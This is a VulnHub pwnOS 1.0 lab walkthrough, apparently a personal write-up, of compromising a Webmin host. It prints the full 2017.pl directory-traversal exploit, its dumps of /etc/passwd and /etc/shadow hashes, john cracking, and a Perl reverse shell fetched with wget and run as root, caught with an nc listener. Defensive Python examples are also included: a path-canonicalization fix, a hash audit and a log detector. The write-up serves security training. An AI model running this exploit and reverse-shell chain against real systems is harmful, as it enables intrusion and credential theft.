PWNOS: 1.0
https://www.vulnhub.com/entry/pwnos-10,33/
Host discovery
# yunki @ yunki in ~ [11:04:09]
$ nmap -sn 192.168.54.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:04 CST
Nmap scan report for 192.168.54.2
Host is up (0.00052s latency).
Nmap scan report for 192.168.54.4
Host is up (0.00068s latency).
nmap scan
# yunki @ yunki in ~ [11:08:38]
$ sudo nmap --min-rate 10000 -p- 192.168.54.4
[sudo] yunki 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:08 CST
Nmap scan report for 192.168.54.4
Host is up (0.00056s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds
# yunki @ yunki in ~ [11:08:57]
$ sudo nmap -sT -sV -O -p22,80,139,445,10000 192.168.54.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:09 CST
Nmap scan report for 192.168.54.4
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.16 seconds
# yunki @ yunki in ~ [11:10:00]
$ sudo nmap -sU -p22,80,139,445,10000 192.168.54.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:10 CST
Nmap scan report for 192.168.54.4
Host is up (0.00057s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
139/udp closed netbios-ssn
445/udp closed microsoft-ds
10000/udp open ndmp
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
# yunki @ yunki in ~ [11:10:09]
$ sudo nmap --script=vuln -p22,80,139,445,10000 192.168.54.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:10 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.4
Host is up (0.00028s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
| /index/: Potentially interesting folder
|_ /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.exploit-db.com/exploits/1997/
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 345.88 seconds
Web directory brute-forcing
# yunki @ yunki in ~ [11:51:16]
$ dirb http://192.168.54.4/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 14 11:51:19 2023
URL_BASE: http://192.168.54.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.4/ ----
+ http://192.168.54.4/cgi-bin/ (CODE:403|SIZE:306)
+ http://192.168.54.4/index (CODE:200|SIZE:295)
+ http://192.168.54.4/index.php (CODE:200|SIZE:295)
+ http://192.168.54.4/index1 (CODE:200|SIZE:1104)
+ http://192.168.54.4/index2 (CODE:200|SIZE:156)
==> DIRECTORY: http://192.168.54.4/php/
+ http://192.168.54.4/server-status (CODE:403|SIZE:311)
---- Entering directory: http://192.168.54.4/php/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Mar 14 11:51:24 2023
DOWNLOADED: 4612 - FOUND: 6
Web penetration
Seeing the URL parameters, try local file inclusion: http://192.168.54.4/index1.php?help=../../../../../../../../../../../etc/passwd&connect=../../../../../../../../../../../etc/passwd
http://192.168.54.4/index2.php?name=&level=n00b&submit=Please+Help%21
http://192.168.54.4/index2.php?name=&level=sk1ll3d+n00b&submit=Please+Help%21
http://192.168.54.4/index2.php?name=&level=l33t+hax0r&submit=Please+Help%21
Nothing more to find here.
Let's look at the other ports.
# yunki @ yunki in ~/vulnhub/pwnos1 [12:09:48] C:1
$ searchsploit webmin
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt
Webmin - Brute Force / Command Execution | multiple/remote/705.pl
webmin 0.91 - Directory Traversal | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation | linux/remote/21765.pl
Webmin 0.x - Code Input Validation | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI) | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit) | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit) | linux/webapps/49318.rb
Webmin 1.x - HTML Email Command Execution | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) | linux/webapps/47330.rb
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
# yunki @ yunki in ~/vulnhub/pwnos1 [12:10:46]
$ searchsploit -m 2017
Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
URL: https://www.exploit-db.com/exploits/2017
Path: /usr/share/exploitdb/exploits/multiple/remote/2017.pl
File Type: Perl script text executable
Copied to: /home/yunki/vulnhub/pwnos1/2017.pl
# yunki @ yunki in ~/vulnhub/pwnos1 [12:11:47]
$ cat 2017.pl
#!/usr/bin/perl
# Exploit for WEBMIN and USERMIN less than 1.29x
# ARBITARY REMOTE FILE DISCLOSURE
# WORKS FOR HTTP AND HTTPS (NOW)
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll _at_ gmail.com
#
#
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).
# Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;
if (@ARGV < 4) {
print("Usage: $0 <url> <port> <filename> <target> \n");
print("TARGETS are\n ");
print("0 - > HTTP \n");
print(" 1 - > HTTPS\n");
print("Define full path with file name \n");
print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n");
exit(1);
}
($target, $port,$filename, $tar) = @ARGV;
print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n");
print("Attacking $target on port $port!\n");
print("FILENAME: $filename\n");
$temp="/..%01" x 40;
if ($tar == '0')
{ my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
$content=get $url;
print("\n FILE CONTENT STARTED");
print("\n -----------------------------------\n");
print("$content");
print("\n -------------------------------------\n");
}
elsif ($tar == '1')
{
my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
my $req = HTTP::Request->new(GET => $url);
my $res = $userag->request($req);
if ($res->is_success) {
print("FILE CONTENT STARTED\n");
print("-------------------------------------------\n");
print $res->as_string;
print("-------------------------------------------\n");
}
else {
print "Failed: ", $res->status_line, "\n";
}
}
# milw0rm.com [2006-07-15]
# yunki @ yunki in ~/vulnhub/pwnos1 [13:42:14] C:1
$ sudo perl 2017.pl 192.168.54.4 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.54.4 on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
-------------------------------------
# yunki @ yunki in ~/vulnhub/pwnos1 [12:15:26]
$ sudo perl 2017.pl 192.168.54.4 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.54.4 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
Save the two outputs above into files named passwd and shadow respectively. (Note: being able to retrieve /etc/shadow, which only root can read, shows that the Webmin process serving the request from the Perl script runs with root privileges.)
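The CVE-2006-3392 text in the nmap output explains the bug as an ordering problem: the path is simplified before it is decoded, so "..%01" survives the "../" filter and only turns into a traversal afterwards. The same class of mistake is what the earlier ../../etc/passwd probe against index1.php was testing for. The following is an added example, not Webmin's or the write-up's code: a simplified model of the flawed order of operations next to the hardened form (decode first, reject control bytes, canonicalize, then check the result stays under the document root). WEB_ROOT is an assumed placeholder path; WEBMIN_PAYLOAD is the request pattern 2017.pl builds ("/..%01" repeated 40 times, then the file name).

```python
"""Why '..%01' slipped past the path filter, and the decode-then-canonicalize fix.
Added example: a simplified model of the CVE-2006-3392 ordering bug, not Webmin's code."""
import os
import re
from typing import Optional
from urllib.parse import unquote

# Assumed document root served under /unauthenticated/ (placeholder for the example).
WEB_ROOT = "/usr/share/webmin/unauthenticated"
# Request path built by 2017.pl on this page: "/..%01" repeated 40 times, then the file.
WEBMIN_PAYLOAD = "/..%01" * 40 + "/etc/passwd"
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def flawed_resolve(root, request_path):
    """Model of the vulnerable order of operations (assumption, simplified):
    1. strip '../' from the still-encoded path,
    2. percent-decode,
    3. drop control characters.
    Step 1 never sees '../' because the byte between '..' and '/' is still
    encoded; step 3 then deletes the decoded \\x01 and the traversal reappears."""
    stripped = request_path.replace("../", "")
    decoded = unquote(stripped)
    cleaned = CONTROL_CHARS.sub("", decoded)
    return os.path.normpath(root + cleaned)


def decode_fully(s, rounds=3):
    """Percent-decode until stable; refuse input that is still changing after
    `rounds` (nested encodings such as %252e are evasion, not a real path)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            return d
        s = d
    return None


def safe_resolve(root, request_path) -> Optional[str]:
    """Hardened form: decode first, reject control bytes, canonicalize, and
    require the result to stay inside `root`. Returns None when rejected."""
    decoded = decode_fully(request_path)
    if decoded is None or CONTROL_CHARS.search(decoded):
        return None
    root_norm = os.path.normpath(root)
    candidate = os.path.normpath(os.path.join(root_norm, decoded.lstrip("/")))
    if candidate != root_norm and not candidate.startswith(root_norm + os.sep):
        return None
    return candidate


if __name__ == "__main__":
    print("flawed :", flawed_resolve(WEB_ROOT, WEBMIN_PAYLOAD))   # escapes to /etc/passwd
    print("hardened:", safe_resolve(WEB_ROOT, WEBMIN_PAYLOAD))   # None (rejected)
    print("normal  :", safe_resolve(WEB_ROOT, "/images/logo.gif"))
```

The containment check is the part that matters: stripping "../" as a string is never sufficient, because any later transformation (decoding, control-character removal, Unicode normalization) can recreate it. Canonicalizing the fully decoded path and comparing it against the root catches every variant at once.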
# yunki @ yunki in ~/vulnhub/pwnos1 [13:53:05]
$ unshadow passwd shadow > hash.txt
# yunki @ yunki in ~/vulnhub/pwnos1 [13:53:16]
$ cat hash.txt
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:!:100:101::/nonexistent:/bin/false
syslog:!:101:102::/home/syslog:/bin/false
klog:!:102:103::/home/klog:/bin/false
mysql:!:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:!:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:1001:1001::/home/obama:/bin/bash
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:1002:1002::/home/osama:/bin/bash
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:1003:1003::/home/yomama:/bin/bash
Cracking the shadow hashes with john
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
...
...
john --show hash.txt
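The reason the wordlist run above finishes so quickly is visible in the hashes themselves: every real account uses the $1$ (MD5-crypt) scheme, which is fast to compute and has a short salt, and the last-change field dates the passwords to mid-2008. As an added example (not part of the write-up), here is an audit that parses passwd/shadow pairs and flags login-capable accounts whose hashes use a legacy scheme, plus empty passwords and extra UID 0 accounts. The sample lines are taken from the page's output plus one constructed "ops" account with a placeholder $6$ hash.

```python
"""Audit passwd/shadow pairs for weak or legacy password hashing (added example)."""
from datetime import date, timedelta

# crypt(3) hash-id prefixes. MD5-crypt ($1$) is fast and uses a small salt, which
# is why a wordlist attack like the one on this page succeeds in seconds.
HASH_PREFIXES = [
    ("$y$", "yescrypt"), ("$7$", "scrypt"), ("$6$", "sha512crypt"),
    ("$5$", "sha256crypt"), ("$2b$", "bcrypt"), ("$2a$", "bcrypt"),
    ("$1$", "md5crypt"),
]
LEGACY_ALGOS = {"md5crypt", "descrypt"}
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}

# Sample input: lines from the page's /etc/passwd and /etc/shadow output, plus a
# constructed "ops" account whose $6$ hash is a placeholder, not a real hash.
PASSWD_SAMPLE = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh",
    "sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin",
    "vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash",
    "obama:x:1001:1001::/home/obama:/bin/bash",
    "ops:x:1004:1004::/home/ops:/bin/bash",  # constructed
]
SHADOW_SAMPLE = [
    "root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::",
    "daemon:*:14040:0:99999:7:::",
    "sshd:!:14040:0:99999:7:::",
    "vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::",
    "obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::",
    "ops:$6$constructedsalt$PLACEHOLDERnotArealHash000000000000000000000000000000000000000000000000:19430:0:99999:7:::",  # constructed
]


def classify_hash(field):
    """Name the hashing scheme of a shadow password field."""
    if field == "":
        return "empty"
    if field[0] in "*!":
        return "locked"
    for prefix, name in HASH_PREFIXES:
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"  # traditional DES crypt: 2-char salt + 11 chars
    return "unknown"


def last_change(days_since_epoch):
    """Shadow field 3 is days since 1970-01-01."""
    return date(1970, 1, 1) + timedelta(days=int(days_since_epoch))


def audit(passwd_lines, shadow_lines):
    """Return (user, finding) pairs for accounts worth fixing."""
    shadow = {}
    for line in shadow_lines:
        f = line.split(":")
        if len(f) >= 3:
            shadow[f[0]] = (f[1], f[2])
    findings = []
    for line in passwd_lines:
        f = line.split(":")
        if len(f) != 7 or f[0] not in shadow:
            continue
        user, uid, shell = f[0], f[2], f[6]
        hash_field, changed = shadow[user]
        algo = classify_hash(hash_field)
        can_login = shell not in NOLOGIN_SHELLS
        if algo == "empty" and can_login:
            findings.append((user, "empty password with login shell"))
        elif algo in LEGACY_ALGOS and can_login:
            findings.append((user, f"{algo} hash, last changed {last_change(changed)}"))
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
    return findings


if __name__ == "__main__":
    for user, finding in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"{user:10} {finding}")
```

On a live system the fix is to rehash with a modern scheme (sha512crypt or yescrypt via the login.defs ENCRYPT_METHOD setting on Debian-family systems) and force a password change for the flagged accounts; locked and nologin accounts are left alone by the audit because their hashes cannot be used to log in.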
Getting an initial shell
Log in over SSH as vmware:h4ckm3
Privilege escalation
From the earlier run of 2017.pl we know that the file it requests is handled with root privileges, so build a Perl reverse shell and upload it to the target.
kali:
# yunki @ yunki in ~ [14:13:56] C:1
$ locate perl-reverse-shell
/usr/share/webshells/perl/perl-reverse-shell.pl
# yunki @ yunki in ~ [14:15:19] C:1
$ cp /usr/share/webshells/perl/perl-reverse-shell.pl vulnhub/pwnos1/shell.cgi
# yunki @ yunki in ~ [14:16:23]
$ cd vulnhub/pwnos1
# edit the IP and port
# yunki @ yunki in ~/vulnhub/pwnos1 [14:16:31]
$ vim shell.cgi
# yunki @ yunki in ~/vulnhub/pwnos1 [14:17:02]
$ php -S 0:80
Target:
vmware@ubuntuvm:/tmp$ cd /tmp
vmware@ubuntuvm:/tmp$ wget http://192.168.54.128/shell.cgi
--01:03:07-- http://192.168.54.128/shell.cgi
=> `shell.cgi.1'
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,716 (3.6K)
100%[===========================================================================================================>] 3,716 --.--K/s
01:03:07 (526.58 MB/s) - `shell.cgi' saved [3716/3716]
vmware@ubuntuvm:/tmp$ chmod +x shell.cgi
Don't forget to make it executable here: chmod +x shell.cgi
Then start a listener and execute the shell file through 2017.pl.
# yunki @ yunki in ~/vulnhub/pwnos1 [14:23:42]
$ sudo perl 2017.pl 192.168.54.4 10000 /tmp/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.54.4 on port 10000!
FILENAME: /tmp/shell.cgi
FILE CONTENT STARTED
-----------------------------------
Browser IP address appears to be: 192.168.54.128<p>
-------------------------------------
Root privileges
# yunki @ yunki in ~ [14:24:02] C:1
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.4] 50328
01:01:41 up 1:20, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
vmware pts/0 192.168.54.128 00:41 4.00s 0.10s 0.10s -bash
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0(root) gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# whoami
root
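Every step of this chain (the /etc/passwd read, the /etc/shadow read, and the request that executed /tmp/shell.cgi) went through the same unauthenticated Webmin endpoint with the same "..%01" pattern, so it is cheap to detect. The following is an added example, not part of the write-up: a small scanner that flags traversal attempts in access-log lines. It assumes common log format (one request per line, "client - user [timestamp] "METHOD path HTTP/x" status size"); adjust LOG_LINE if your miniserv or proxy logs differ. The sample lines are constructed to mirror the requests made on this page.

```python
"""Flag Webmin-style path traversal attempts in access-log lines (added example)."""
import re
from urllib.parse import unquote

# Assumed common log format; treat the exact layout as an assumption for your deployment.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
# Percent-encoded control bytes (%00-%1f, %7f) have no business in a URL path.
ENCODED_CONTROL = re.compile(r"%(?:0[0-9a-f]|1[0-9a-f]|7f)", re.IGNORECASE)
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/webmin/", "/root/")

# Constructed sample log, modelled on the three requests made on this page plus
# two benign ones. Not real log data.
SAMPLE_LOG = [
    '192.168.54.128 - - [14/Mar/2023:13:42:14 +0800] "GET /unauthenticated/..%01/..%01/..%01/..%01/etc/passwd HTTP/1.1" 200 1312',
    '192.168.54.128 - - [14/Mar/2023:13:53:05 +0800] "GET /unauthenticated/..%01/..%01/..%01/..%01/etc/shadow HTTP/1.1" 200 1021',
    '192.168.54.128 - - [14/Mar/2023:14:23:42 +0800] "GET /unauthenticated/..%01/..%01/tmp/shell.cgi HTTP/1.1" 200 57',
    '10.0.0.7 - - [14/Mar/2023:14:30:00 +0800] "GET /unauthenticated/style.css HTTP/1.1" 200 4410',
    '10.0.0.7 - admin [14/Mar/2023:14:31:12 +0800] "POST /session_login.cgi HTTP/1.1" 302 0',
]


def traversal_indicators(path):
    """Return the list of reasons a request path looks like a traversal attempt."""
    reasons = []
    if ENCODED_CONTROL.search(path):
        reasons.append("percent-encoded control byte in path")
    # Decode once and drop control bytes the way a lax sanitizer would collapse
    # them, so that "..%01/" is recognised as the "../" it becomes server-side.
    collapsed = CONTROL_CHARS.sub("", unquote(path))
    if re.search(r"(?:^|/)\.\.(?:/|$)", collapsed):
        reasons.append("parent-directory traversal after decoding")
    if any(s in collapsed for s in SENSITIVE):
        reasons.append("sensitive file requested")
    return reasons


def scan(lines):
    """Parse log lines and return one alert dict per suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = traversal_indicators(m["path"])
        if not reasons:
            continue
        alerts.append({
            "src": m["src"],
            "ts": m["ts"],
            "path": m["path"],
            "status": int(m["status"]),
            # A 200 means the traversal was served, not just attempted.
            "served": m["status"] == "200",
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        flag = "SERVED" if a["served"] else "blocked"
        print(f'{a["ts"]} {a["src"]} {flag} {a["path"]}  <- {"; ".join(a["reasons"])}')
```

A 200 on a traversal path is the signal to escalate: it means the read or execution succeeded, as it did three times here. The durable fix on the host side is the one the nmap script output already names (Webmin 1.290 or later), combined with not exposing port 10000 beyond the hosts that need it.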